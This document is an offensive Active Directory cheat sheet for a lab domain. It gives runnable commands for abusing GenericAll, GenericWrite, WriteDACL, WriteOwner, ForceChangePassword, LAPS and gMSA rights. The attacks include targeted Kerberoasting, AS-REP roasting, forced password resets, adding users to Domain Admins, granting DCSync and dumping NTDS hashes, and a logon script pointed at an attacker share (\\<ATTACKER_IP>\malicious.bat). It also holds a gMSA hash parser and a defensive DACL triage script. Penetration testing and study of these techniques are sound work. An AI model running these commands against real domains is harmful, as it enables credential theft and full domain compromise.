Abusing ACLs/ACEs

GenericAll/GenericWrite

User/Computer

Targeted Kerberoasting: with write access to a user object we can set an arbitrary SPN on it, request a service ticket (TGS) for that SPN, extract the hash from the ticket and crack it offline exactly as in a normal Kerberoasting attack. The ticket is encrypted with the target's password hash, so this only pays off if that password is crackable; always remove the SPN afterwards.

Requirements: GenericAll or GenericWrite on the target user (WriteProperty on servicePrincipalName is enough)

Linux

# Assign a fake SPN (cifs/gzzcoo) to the account called 'target'.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'

# Get the TGS ticket of the user we made Kerberoastable.
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request-user 'target'

# Leave the SPN empty on the user we had made Kerberoastable.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName

Alternative with PowerView.py:

# Through PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

# targetedKerberoast.py automates the whole flow: for every user our account can write to, it sets a temporary SPN, prints the TGS hash and removes the SPN again.
python3 targetedKerberoast.py --dc-ip 10.10.10.10 -d domain.htb -u 'user' -p 'password'

Windows

# Make sure the victim user doesn't have an SPN
Get-DomainUser 'victimuser' | Select serviceprincipalname

# Configure the SPN for the victim user
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='cifs/gzzcoo'}

# Get the Kerberoast hash
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl

# Remove the SPN from the victim user to leave it as it was
$User | Select serviceprincipalname
Set-DomainObject -Identity 'victimuser' -Clear serviceprincipalname

AS-REP Roast Attack

We can set the DONT_REQ_PREAUTH flag (0x400000) in the target's userAccountControl, request a TGT for it without pre-authentication and crack the hash embedded in the AS-REP (AS-REP Roasting). As with the SPN trick, success depends on the target's password being weak; clear the flag afterwards.

Requirements: GenericAll or GenericWrite on the target user (WriteProperty on userAccountControl is enough)

Linux

# Assign the user 'target' the flag (DONT_REQ_PREAUTH)
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH

# Request the TGT ticket of the AS-REP Roastable user
impacket-GetNPUsers domain.htb/target -no-pass -dc-ip 10.10.10.10 -format hashcat 2>/dev/null

# Return the AS-REP Roastable user to normal
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove uac 'TARGET' -f DONT_REQ_PREAUTH

Alternative with PowerView.py:

# From PowerView.py. 4260352 = 0x410200 = NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD + DONT_REQ_PREAUTH.
# -Set overwrites the whole attribute: read the current userAccountControl first and write it back afterwards,
# otherwise any other flag the target had (delegation settings, PASSWD_NOTREQD, ...) is silently lost.
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

Windows

# Requires PowerView.ps1 and ASREPRoast.ps1 imported on the Windows host

# Check the current userAccountControl (UAC) flags of the target
Get-DomainUser username | ConvertFrom-UACValue

# Toggle DONT_REQ_PREAUTH (0x400000 = 4194304) with -XOR so the other flags are left untouched
Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser username | ConvertFrom-UACValue

# Request the AS-REP hash
Get-ASREPHash -Domain domain.htb -UserName username

# Toggle DONT_REQ_PREAUTH back off to restore the original UAC value
Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser username | ConvertFrom-UACValue

Password Modification

Reset another user's password without knowing the current one.

Requirements: GenericAll on the user (GenericAll includes the User-Force-Change-Password extended right; see ForceChangePassword below). This is destructive: the legitimate user is locked out until the password is reset again, so record the change for clean-up and the report.

Linux

# Modify the password of user 'USER_TARGET' to 'Password01!' with bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with rpcclient
rpcclient -U 'user%password' 10.10.10.10 -W <DOMAIN> -c 'setuserinfo2 <user_target> 23 Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with net rpc
net rpc password "user_target" "Password01!" -U 'domain.htb/user%password' -S 10.10.10.10

# Modify the password of user 'USER_TARGET' to 'Password01!' with PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Verification:

# Verify that the change has been made successfully
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'

Windows

# From a domain-joined host, running as an account that holds the right
net user <user_target> Password01! /domain

# From PowerShell with PowerView, passing explicit credentials when the shell does not run as the attacking user
$SecPassword = ConvertTo-SecureString 'Password_Attacker' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\user_attacker',$SecPassword)
$NewPass = ConvertTo-SecureString 'Password01!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'user_target' -AccountPassword $NewPass -Credential $Cred

Script Path Manipulation

WriteProperty on the Script-Path attribute (scriptPath), which both GenericAll and GenericWrite include, lets us overwrite the target user's logon script path. The next time that user logs on interactively, the session runs our script with their privileges. The path is resolved relative to the domain's NETLOGON share unless a UNC path is given, so point it at a share we control or at a file we have already planted on the host.

Requirements: GenericAll or GenericWrite on the target user (WriteProperty on scriptPath is enough)

Linux

# Assign user 'TARGET' a malicious script that will execute when they log in
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'

Windows

# Point user 'target' at a malicious script already placed on the machine they log on to
Set-DomainObject -Identity 'target' -Set @{scriptpath='C:\ProgramData\test\test.ps1'}

Group Manipulation

Add ourselves, or another user we control, to a group. Requirements: GenericAll, GenericWrite or WriteProperty on member over the group (Self-Membership only allows adding our own account).

Linux

# We have GenericAll permissions on the group, so we add ourselves to the group
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add groupMember 'Domain Admins' 'user'

# Add user 'UserToAdd' to a group where we have GenericAll permissions
net rpc group ADDMEM 'GROUP TARGET' 'UserToAdd' -U 'user%password' -W domain.htb -I 10.10.10.10

# Add user 'target' to group 'Group_target'
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Add-DomainGroupMember -Identity 'Group_target' -Members 'target'

Windows

net group "GROUP TARGET" USER_TARGET /add /domain

WriteDACL

This permission allows modifying the Discretionary Access Control List (DACL) of an object, enabling the user to change associated permissions. An attacker with WriteDACL could grant themselves additional privileges or revoke legitimate access, compromising system security.

WriteDACL on Domain

Linux

# With WriteDACL on the domain object we can grant the two replication rights DCSync needs
# (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) to any trustee, here our own account
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add dcsync 'user'

# With those rights we replicate the NTDS secrets as that account
impacket-secretsdump domain.htb/'user':'password'@10.10.10.10 -dc-ip 10.10.10.10 -just-dc-ntlm

# Remove the rights again afterwards
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove dcsync 'user'

Windows

# Grant DCSync permissions to identity 'user_target'
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password01!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\hacker', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=htb' -Rights DCSync -PrincipalIdentity 'user_target' -Verbose -Domain domain.htb

WriteDACL on Group

Linux

# With WriteDACL on a group, we grant a user full control permissions over the group
bloodyAD  --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add genericAll 'cn=GROUP_TARGET,dc=domain,dc=htb' 'user'

# Remove the genericAll permission to leave it as before
bloodyAD  --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove genericAll 'cn=GROUP_TARGET,dc=domain,dc=htb' 'user'

Windows

# Through PowerView: first use our WriteDACL to give our account WriteMembers on the group
Add-DomainObjectAcl -TargetIdentity 'GROUP_TARGET' -Rights WriteMembers -PrincipalIdentity 'user_target'
# Then add ourselves to the group with native Windows commands
net group "GROUP_TARGET" user_target /add /domain

WriteOwner

An attacker can become the owner of an object. Once the owner has been modified to one that the attacker has access to, they can manipulate the object having absolute control over it.

Linux

# Make USER_TARGET (normally our own account) the owner of the object.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'

# Ownership implies WriteDACL on the object, so as owner we grant ourselves genericAll for full control.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'

Alternative with PowerView.py:

# Make user 'user_target' the owner of object 'object_target'
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

Windows

# Requires PowerView.ps1; -Credential is only needed when the shell does not run as the attacking user
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\hacker', $SecPassword)
# Take ownership of the object (the owner implicitly has WriteDACL on it)
Set-DomainObjectOwner -Credential $Cred -Identity 'object_target' -OwnerIdentity 'user_target'
# As owner, grant ourselves full control (-Rights defaults to All); for a group, WriteMembers is enough
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'object_target' -PrincipalIdentity 'user_target' -Rights All
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'object_target' -PrincipalIdentity 'user_target' -Rights WriteMembers

ReadLAPSPassword

ReadLAPSPassword (ReadProperty on ms-Mcs-AdmPwd) lets us read the local Administrator password that legacy LAPS stores in clear text on the computer object the ACE applies to. Windows LAPS uses the msLAPS-Password / msLAPS-EncryptedPassword attributes instead, so adjust the attribute names if the queries below return nothing.

Linux

# Read LAPS password through bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# Read LAPS password through nxc
nxc ldap 10.10.10.10 -u 'user' -p 'password' -M laps

# Read LAPS password through LAPSDumper
python3 laps.py -u 'user' -p 'password' -d domain.htb

Windows

# Read LAPS password through PowerShell (native command)
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# Read LAPS password through Get-LAPSPasswords.ps1
Get-LAPSPasswords -DomainController 10.10.10.10 -Credential domain.htb\user| Format-Table -AutoSize

ReadGMSAPassword

ReadGMSAPassword means our principal is listed in the gMSA's msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword), so we can read its msDS-ManagedPassword attribute. The DC only returns that attribute over an encrypted channel (LDAPS or a sealed LDAP bind), and the value is a binary blob holding a 240-byte random password: tools convert it to the NT hash, which is then used with pass-the-hash as the gMSA account (name ending in $).

Linux

# Read GMSA password through bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword

# Read GMSA password through nxc
nxc ldap 10.10.10.10 -u 'user' -p 'password' --gmsa

# Read GMSA password through gMSADumper
python3 gMSADumper.py -u 'user' -p 'password' -d domain.htb

# Read GMSA password through PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Get-GMSA
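Added example, not from the original notes: what the raw msDS-ManagedPassword attribute contains and how bloodyAD, nxc and gMSADumper turn it into the NT hash they print. The layout is MS-ADTS's MSDS-MANAGEDPASSWORD_BLOB; the sample blob below is constructed locally so the code runs offline, and an MD4 routine is included because hashlib's md4 is frequently unavailable on OpenSSL 3 builds. The managed password is random bytes, so it is only ever used with pass-the-hash (e.g. `nxc smb 10.10.10.10 -u 'gmsa$' -H <nt_hash>`), never typed.

```python
import struct

# Added example (not from the original page): parse an msDS-ManagedPassword value
# (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS 2.2.19) and derive the NT hash tools print.
# build_managed_password_blob() only exists to construct an offline test vector.

TICKS_PER_DAY = 10_000_000 * 86_400   # intervals are 100-ns units, like FILETIME


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). NT hash = MD4(UTF-16LE password)."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[j] + k) & M, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    return _md4(password_utf16le).hex()


def _utf16z(buf: bytes, off: int) -> bytes:
    """UTF-16LE string starting at off, terminated by a 2-byte NUL."""
    end = off
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end]


def parse_managed_password_blob(blob: bytes) -> dict:
    """Header: Version, Reserved, Length, then four offsets into the blob."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    current = _utf16z(blob, cur_off)
    previous = _utf16z(blob, prev_off) if prev_off else None   # present only around a rollover
    return {
        "current_nt": nt_hash(current),
        "previous_nt": nt_hash(previous) if previous is not None else None,
        "query_interval_days": struct.unpack_from("<q", blob, qpi_off)[0] / TICKS_PER_DAY,
        "unchanged_interval_days": struct.unpack_from("<q", blob, upi_off)[0] / TICKS_PER_DAY,
    }


def build_managed_password_blob(current: str, previous, query_days: float, unchanged_days: float) -> bytes:
    """Constructed test vector laid out like the real attribute: 16-byte header, NUL-terminated
    UTF-16LE passwords, padding to 8-byte alignment, two LARGE_INTEGER intervals."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = (previous.encode("utf-16-le") + b"\x00\x00") if previous is not None else b""
    body = cur + prev
    body += b"\x00" * ((-(16 + len(body))) % 8)
    cur_off = 16
    prev_off = 16 + len(cur) if previous is not None else 0
    qpi_off = 16 + len(body)
    upi_off = qpi_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, upi_off + 8, cur_off, prev_off, qpi_off, upi_off)
    intervals = struct.pack("<qq", int(query_days * TICKS_PER_DAY), int(unchanged_days * TICKS_PER_DAY))
    return header + body + intervals


if __name__ == "__main__":
    # Constructed sample; a real gMSA password is 120 random UTF-16 code units
    sample = build_managed_password_blob("password", None, 30, 29)
    print(parse_managed_password_blob(sample))
```

Feed the real value to `parse_managed_password_blob` as raw bytes (for example the `msDS-ManagedPassword` value from an ldap3 query with `raw_values`): the `current_nt` field is what `nxc --gmsa` prints, and `previous_nt` is still valid for a short window after the automatic 30-day rollover.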

ForceChangePassword

ForceChangePassword (the User-Force-Change-Password extended right) lets us reset the target user's password without knowing the current one. It is a reset, not a change: the legitimate user is locked out until it is reset again and the event is logged (4724 on the DC), so on a real engagement prefer a less disruptive path where one exists and record the change for clean-up.

Linux

# Modify the password of user 'USER_TARGET' to 'Password01!' with bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with rpcclient
rpcclient -U 'user%password' 10.10.10.10 -W <DOMAIN> -c 'setuserinfo2 <user_target> 23 Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with net rpc
net rpc password "user_target" "Password01!" -U 'domain.htb/user%password' -S 10.10.10.10

# Modify the password of user 'USER_TARGET' to 'Password01!' with PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Verification:

# Verify that the change has been made successfully
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'

Windows

# From a domain-joined host, running as an account that holds the right
net user <user_target> Password01! /domain

# From PowerShell with PowerView, passing explicit credentials when the shell does not run as the attacking user
$SecPassword = ConvertTo-SecureString 'Password_Attacker' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\user_attacker',$SecPassword)
$NewPass = ConvertTo-SecureString 'Password01!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'user_target' -AccountPassword $NewPass -Credential $Cred

Organizational Units ACL

ACLs on Organizational Units (OUs) can be exploited to compromise the objects contained within them, because ACEs written on the OU with inheritance flags propagate to its children.

Non-Privileged Objects

A user with GenericAll or WriteDACL on an OU can add an ACE granting FullControl with inheritance enabled (CONTAINER_INHERIT); every child object that does not block inheritance picks it up and is compromised. Objects protected by AdminSDHolder (adminCount=1, e.g. Domain Admins members) have inheritance disabled and their ACL is re-stamped by SDProp, so they are not reached this way; hence the "non-privileged" qualifier.

Linux

# Grant ourselves FullControl over the OU called TESTERS
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal 'username' -target-dn 'ou=testers,dc=domain,dc=htb' 'domain.htb'/'user':'password' -dc-ip 10.10.10.10 2>/dev/null

# Verify that we have FullControl over the OU called TESTERS
impacket-dacledit -action 'read' -principal 'username' -target-dn 'ou=testers,dc=domain,dc=htb' 'domain.htb'/'user':'password' -dc-ip 10.10.10.10 2>/dev/null
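Added example (not part of the original page) tying together the WriteDACL section and the OU inheritance point above: a small triage of a DACL exported as SDDL, e.g. `(Get-Acl "AD:\OU=Testers,DC=domain,DC=htb").Sddl` in PowerShell, reporting which allow ACEs grant the rights abused on this page and whether each one is container-inheritable (the `CI` flag that dacledit's `-inheritance` produces), inherit-only, or itself inherited from a parent. The SDDL string and SIDs are constructed placeholders; the GUIDs are the real schema and extended-right GUIDs.

```python
from __future__ import annotations
import re

# Added example (not from the original page): triage a DACL given as an SDDL string for
# ACEs that give the kinds of control abused on this page, and report their inheritance.
RIGHT_CODES = {  # two-letter SDDL access-right codes relevant to AD objects
    "GA": "GenericAll", "GW": "GenericWrite", "GR": "GenericRead", "GX": "GenericExecute",
    "WD": "WriteDACL", "WO": "WriteOwner", "RC": "ReadControl", "SD": "Delete",
    "RP": "ReadProperty", "WP": "WriteProperty", "CC": "CreateChild", "DC": "DeleteChild",
    "LC": "ListChildren", "SW": "Self", "LO": "ListObject", "DT": "DeleteTree", "CR": "ControlAccess",
}
MASK_BITS = {  # ADS_RIGHT_* / generic bits, for rights written as a hex mask instead of codes
    0x10000000: "GenericAll", 0x40000000: "GenericWrite", 0x80000000: "GenericRead",
    0x20000000: "GenericExecute", 0x00040000: "WriteDACL", 0x00080000: "WriteOwner",
    0x00020000: "ReadControl", 0x00010000: "Delete", 0x00000010: "ReadProperty",
    0x00000020: "WriteProperty", 0x00000001: "CreateChild", 0x00000002: "DeleteChild",
    0x00000004: "ListChildren", 0x00000008: "Self", 0x00000080: "ListObject",
    0x00000040: "DeleteTree", 0x00000100: "ControlAccess",
}
OBJECT_GUIDS = {  # property / extended-right GUIDs that turn WP or CR into the attacks above
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "Member",
    "bf9679a8-0de6-11d0-a285-00aa003049e2": "Script-Path",
    "f3a64788-5306-11d1-a9c5-0000f80367c1": "Service-Principal-Name",
    "bf967a68-0de6-11d0-a285-00aa003049e2": "User-Account-Control",
    "e362ed86-b728-0842-b27d-2dea7a9df218": "ms-DS-Managed-Password",
}
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteDACL", "WriteOwner"}
TARGETED_RIGHTS = {"WriteProperty", "ControlAccess", "Self"}   # dangerous with the right GUID (or none)


def _parse_rights(field: str) -> set[str]:
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in MASK_BITS.items() if mask & bit}
    return {RIGHT_CODES.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)}


def parse_dacl(sddl: str) -> list[dict]:
    """One dict per ACE in the D: part; fields are type;flags;rights;object_guid;inherit_guid;sid."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        ace_type, flags, rights, obj_guid, _inh_guid, sid = ace.split(";")[:6]
        flag_set = {flags[i:i + 2] for i in range(0, len(flags), 2)}
        aces.append({
            "type": ace_type, "sid": sid, "rights": _parse_rights(rights),
            "object": OBJECT_GUIDS.get(obj_guid.lower(), obj_guid.lower() or None),
            "inherits_to_children": "CI" in flag_set,   # CONTAINER_INHERIT: the OU case
            "inherit_only": "IO" in flag_set,           # applies to children, not the OU itself
            "inherited": "ID" in flag_set,              # came from a parent container
        })
    return aces


def dangerous_aces(sddl: str) -> list[dict]:
    """Allow ACEs granting object control, a targeted property write, or an extended right."""
    out = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA"):
            continue
        hit = ace["rights"] & CONTROL_RIGHTS
        # no GUID means every property / every extended right; a known GUID means a specific one
        if ace["object"] is None or ace["object"] in OBJECT_GUIDS.values():
            hit |= ace["rights"] & TARGETED_RIGHTS
        if hit:
            out.append({**ace, "why": sorted(hit)})
    return out


# Constructed sample DACL of an OU: Domain Admins ("DA") with full rights, a user with
# inheritable WriteDACL, a ForceChangePassword ACE, an inherit-only WriteProperty on Member,
# a GenericAll ACE inherited from a parent, and a harmless read ACE for Authenticated Users.
SAMPLE_SDDL = (
    "O:DAG:DAD:"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;CI;WD;;;S-1-5-21-1-2-3-1105)"
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1-2-3-1106)"
    "(OA;CIIO;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-1-2-3-1107)"
    "(A;ID;GA;;;S-1-5-21-1-2-3-1108)"
    "(A;;RPLCLORC;;;AU)"
)

if __name__ == "__main__":
    for f in dangerous_aces(SAMPLE_SDDL):
        print(f["sid"], f["why"], f["object"], "inherits to children" if f["inherits_to_children"] else "")
```

An ACE written by `impacket-dacledit -rights FullControl -inheritance` shows up as `(A;CI;...;;;<sid>)` with GenericAll-equivalent rights, which this triage flags as `inherits_to_children`; an ACE without `CI` on an OU only matters for the OU object itself. Rights given as a hex mask (`(A;;0x40000;;;<sid>)`) are decoded through `MASK_BITS`.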

Last updated 12 days ago